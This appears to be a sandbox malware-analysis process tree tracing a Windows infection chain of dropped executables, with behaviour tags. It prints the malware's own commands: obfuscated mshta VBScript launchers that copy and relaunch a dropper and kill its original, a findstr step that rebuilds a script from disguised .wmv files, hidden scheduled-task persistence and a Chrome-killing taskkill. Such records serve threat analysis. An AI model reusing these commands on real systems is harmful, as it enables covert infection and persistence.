C:\Users\Admin\Pictures\Adobe Films\drBU9VmRknQ_vIbycQ1TRJja.exe"C:\Users\Admin\Pictures\Adobe Films\drBU9VmRknQ_vIbycQ1TRJja.exe"7⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"8⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Users\Admin\Pictures\Adobe Films\uqU30ZEqXanLoKHETUfsMFnI.exe"C:\Users\Admin\Pictures\Adobe Films\uqU30ZEqXanLoKHETUfsMFnI.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\InmQJqusjLmmJqd6VDE42ZA1.exe"C:\Users\Admin\Pictures\Adobe Films\InmQJqusjLmmJqd6VDE42ZA1.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\9t_XgksU4Dzwi6egFQDvx1fp.exe"C:\Users\Admin\Pictures\Adobe Films\9t_XgksU4Dzwi6egFQDvx1fp.exe"7⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\n5v5rXBtVfUwFazL5gcyH5nd.exe"C:\Users\Admin\Pictures\Adobe Films\n5v5rXBtVfUwFazL5gcyH5nd.exe"7⤵
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\svchost.exesvchost.exe8⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Benvenuta.wmv8⤵
-
C:\Windows\SysWOW64\cmd.execmd9⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^cumYgySQBgxPdjFKcKawUwBIsAmBYzAvcYxZIAEmtYNfVBRWjWqBCNmzERHNFdSiOXxsRGwVuTWVhjNPJDfwzYUHnqxRTQTNuGAXimtGVt$" Allora.wmv10⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comAltrove.exe.com e10⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e11⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e13⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e14⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e15⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e17⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e18⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e19⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e20⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e21⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e22⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e23⤵
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e24⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e25⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e26⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e27⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e28⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e29⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e30⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e31⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e32⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e33⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e34⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e35⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e36⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e37⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.110⤵
- Runs ping.exe
-
C:\Users\Admin\Pictures\Adobe Films\6sP7IYHZbxtGncwXAj98hGw5.exe"C:\Users\Admin\Pictures\Adobe Films\6sP7IYHZbxtGncwXAj98hGw5.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\CMjkI8RBSAd9eKlLZu4TDzBu.exe"C:\Users\Admin\Pictures\Adobe Films\CMjkI8RBSAd9eKlLZu4TDzBu.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\1Uyk4qFSwyW1EXfQbuSo_xnL.exe"C:\Users\Admin\Pictures\Adobe Films\1Uyk4qFSwyW1EXfQbuSo_xnL.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\TYqkP0BGsITbAqtS0zzQKGqK.exe"C:\Users\Admin\Pictures\Adobe Films\TYqkP0BGsITbAqtS0zzQKGqK.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\xAO6dclF7ne8_15aa_zi5YVc.exe"C:\Users\Admin\Pictures\Adobe Films\xAO6dclF7ne8_15aa_zi5YVc.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\FCo5i_wxm1RQVTWzj9BT6Y_a.exe"C:\Users\Admin\Pictures\Adobe Films\FCo5i_wxm1RQVTWzj9BT6Y_a.exe"7⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b3a5ca1a712d390.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed09b3a5ca1a712d390.exeWed09b3a5ca1a712d390.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\7021540.exe"C:\Users\Admin\AppData\Roaming\7021540.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1826133.exe"C:\Users\Admin\AppData\Roaming\1826133.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\7119950.exe"C:\Users\Admin\AppData\Roaming\7119950.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\2482716.exe"C:\Users\Admin\AppData\Roaming\2482716.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0971f17486f8.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed0971f17486f8.exeWed0971f17486f8.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed0971f17486f8.exeC:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed0971f17486f8.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09db0d52c38.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed09db0d52c38.exeWed09db0d52c38.exe6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0901eb1dae126e32.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed0901eb1dae126e32.exeWed0901eb1dae126e32.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed0901eb1dae126e32.exeC:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed0901eb1dae126e32.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09cfb2f9758281d8.exe /mixone5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed09cfb2f9758281d8.exeWed09cfb2f9758281d8.exe /mixone6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 6607⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 6767⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 6847⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 6367⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 8927⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 9847⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 11127⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09977fdc12334.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed09977fdc12334.exeWed09977fdc12334.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\J4R2QmhmUs6vR3esK9GHJ2dY.exe"C:\Users\Admin\Pictures\Adobe Films\J4R2QmhmUs6vR3esK9GHJ2dY.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\tJzs0HBDNzmOaCib0YjRPyB5.exe"C:\Users\Admin\Pictures\Adobe Films\tJzs0HBDNzmOaCib0YjRPyB5.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\zErjzXlUnzToTE2TAAXJkw4a.exe"C:\Users\Admin\Pictures\Adobe Films\zErjzXlUnzToTE2TAAXJkw4a.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\5_rJP8i3nY2NDlmQc8LhQLbo.exe"C:\Users\Admin\Pictures\Adobe Films\5_rJP8i3nY2NDlmQc8LhQLbo.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\hsTSP4VnJysVBjcJ8SJwKxU_.exe"C:\Users\Admin\Pictures\Adobe Films\hsTSP4VnJysVBjcJ8SJwKxU_.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\aUWn94KiBw4hRviTZDKtkVqK.exe"C:\Users\Admin\Pictures\Adobe Films\aUWn94KiBw4hRviTZDKtkVqK.exe"7⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\mt8PKpgSrvPI6tl97_jOGNd2.exe"C:\Users\Admin\Documents\mt8PKpgSrvPI6tl97_jOGNd2.exe"8⤵
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\so8dBWK1ajq908l7nssXpRXX.exe"C:\Users\Admin\Pictures\Adobe Films\so8dBWK1ajq908l7nssXpRXX.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\MKRo5YMGM__f5hDcHqF4ReeL.exe"C:\Users\Admin\Pictures\Adobe Films\MKRo5YMGM__f5hDcHqF4ReeL.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\gCo4OyFs2N4t6fiDi2C91ykm.exe"C:\Users\Admin\Pictures\Adobe Films\gCo4OyFs2N4t6fiDi2C91ykm.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\3qI86GzaswHJ3MRZwaMIFak0.exe"C:\Users\Admin\Pictures\Adobe Films\3qI86GzaswHJ3MRZwaMIFak0.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\SytbxxzvinPmg4AN4bjqkAn7.exe"C:\Users\Admin\Pictures\Adobe Films\SytbxxzvinPmg4AN4bjqkAn7.exe"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\SytbxxzvinPmg4AN4bjqkAn7.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\SytbxxzvinPmg4AN4bjqkAn7.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\SytbxxzvinPmg4AN4bjqkAn7.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\SytbxxzvinPmg4AN4bjqkAn7.exe" ) do taskkill -f -iM "%~NxM"11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "SytbxxzvinPmg4AN4bjqkAn7.exe"12⤵
- Kills process with taskkill
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\WGaueqaA5WgjQ2wtldL6B2zN.exe"C:\Users\Admin\Pictures\Adobe Films\WGaueqaA5WgjQ2wtldL6B2zN.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\CzvriR3OKzht_uSr2xzsy5fM.exe"C:\Users\Admin\Pictures\Adobe Films\CzvriR3OKzht_uSr2xzsy5fM.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-27IN2.tmp\CzvriR3OKzht_uSr2xzsy5fM.tmp"C:\Users\Admin\AppData\Local\Temp\is-27IN2.tmp\CzvriR3OKzht_uSr2xzsy5fM.tmp" /SL5="$1069C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\CzvriR3OKzht_uSr2xzsy5fM.exe"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-84EOU.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-84EOU.tmp\DYbALA.exe" /S /UID=270911⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Photo Viewer\KODNEBRVTC\foldershare.exe"C:\Program Files\Windows Photo Viewer\KODNEBRVTC\foldershare.exe" /VERYSILENT12⤵
-
C:\Users\Admin\AppData\Local\Temp\9d-722dc-515-52faf-c0470fe2d5fb9\Sawunagutu.exe"C:\Users\Admin\AppData\Local\Temp\9d-722dc-515-52faf-c0470fe2d5fb9\Sawunagutu.exe"12⤵
-
C:\Users\Admin\AppData\Local\Temp\73-39c7f-5b8-b2d8a-3a1ad2867c860\Nahybacosha.exe"C:\Users\Admin\AppData\Local\Temp\73-39c7f-5b8-b2d8a-3a1ad2867c860\Nahybacosha.exe"12⤵
- Loads dropped DLL
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\giygywjg.xw3\GcleanerEU.exe /eufive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\giygywjg.xw3\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\giygywjg.xw3\GcleanerEU.exe /eufive14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mnkler2i.vgg\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\mnkler2i.vgg\installer.exeC:\Users\Admin\AppData\Local\Temp\mnkler2i.vgg\installer.exe /qn CAMPAIGN="654"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vukituws.mk4\any.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\vukituws.mk4\any.exeC:\Users\Admin\AppData\Local\Temp\vukituws.mk4\any.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\vukituws.mk4\any.exe"C:\Users\Admin\AppData\Local\Temp\vukituws.mk4\any.exe" -u15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tlyp2n4e.bsk\gcleaner.exe /mixfive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\tlyp2n4e.bsk\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\tlyp2n4e.bsk\gcleaner.exe /mixfive14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\befs4iai.0yw\autosubplayer.exe /S & exit13⤵
-
C:\Users\Admin\Pictures\Adobe Films\lJJm_7OocM3LKQ0WJcT08yXV.exe"C:\Users\Admin\Pictures\Adobe Films\lJJm_7OocM3LKQ0WJcT08yXV.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"11⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x214,0x218,0x21c,0x1f0,0x220,0x7ff836d0dec0,0x7ff836d0ded0,0x7ff836d0dee012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1676,13778851596469525404,17502502840820065322,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9248_316997261" --mojo-platform-channel-handle=1740 /prefetch:812⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1676,13778851596469525404,17502502840820065322,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9248_316997261" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1692 /prefetch:212⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1676,13778851596469525404,17502502840820065322,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9248_316997261" --mojo-platform-channel-handle=2140 /prefetch:812⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1676,13778851596469525404,17502502840820065322,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9248_316997261" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2552 /prefetch:112⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1676,13778851596469525404,17502502840820065322,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9248_316997261" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2620 /prefetch:112⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,13778851596469525404,17502502840820065322,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9248_316997261" --mojo-platform-channel-handle=3116 /prefetch:812⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1676,13778851596469525404,17502502840820065322,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9248_316997261" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3288 /prefetch:212⤵
-
C:\Users\Admin\Pictures\Adobe Films\SHYnBZdZoq4bJiIUgku_9n56.exe"C:\Users\Admin\Pictures\Adobe Films\SHYnBZdZoq4bJiIUgku_9n56.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d27135e5a8b3b.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed09d27135e5a8b3b.exeWed09d27135e5a8b3b.exe6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b2a8bc4f16cb.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed09b2a8bc4f16cb.exeWed09b2a8bc4f16cb.exe6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09abf83d9c2.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed09abf83d9c2.exeWed09abf83d9c2.exe6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed09abf83d9c2.exe"C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed09abf83d9c2.exe" -u7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed094c47c32b.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed094c47c32b.exeWed094c47c32b.exe6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE ( CREatEObJEcT ( "WSCRIpt.ShELL" ). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """" == """" for %L IN (""C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe) )7⤵
-
